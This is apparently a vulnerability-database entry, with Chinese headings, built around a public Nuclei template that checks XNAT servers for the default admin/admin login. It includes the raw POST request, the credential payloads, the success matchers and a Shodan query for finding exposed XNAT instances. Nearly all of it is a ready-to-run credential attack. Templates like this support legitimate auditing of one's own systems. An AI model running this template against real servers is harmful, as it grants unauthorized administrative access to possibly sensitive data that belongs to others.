漏洞描述
XNAT contains an admin default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
xnat-default-login: XNAT - Default Login
PoC代码[已公开]
id: xnat-default-login
info:
name: XNAT - Default Login
author: 0x_Akoko
severity: high
description: XNAT contains an admin default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://wiki.xnat.org/documentation/xnat-administration/xnat-setup-first-time-configuration#:~:text=Log%20in%20with%20the%20username%20admin%20and%20password%20admin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:xnat:xnat:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.title:"XNAT"
product: xnat
vendor: xnat
tags: default-login,xnat,vuln
http:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login_method=localdb&username={{username}}&password={{password}}&login=&XNAT_CSRF=
attack: pitchfork
payloads:
username:
- admin
password:
- admin
matchers-condition: and
matchers:
- type: word
part: header
words:
- "app/template/Index.vm?login=true"
- "JSESSIONID"
condition: and
- type: status
status:
- 302
# digest: 4b0a00483046022100fb8cc93ee7206153c5d6165230fd20326ccb4a2ccbd2fbc91bbfb7d8918000d3022100fcd305686e6d18ff36a1a0afc3e229900fa77b4edbde12f865c187780a6b6b2a:922c64590222798bb761d5b6d8e72950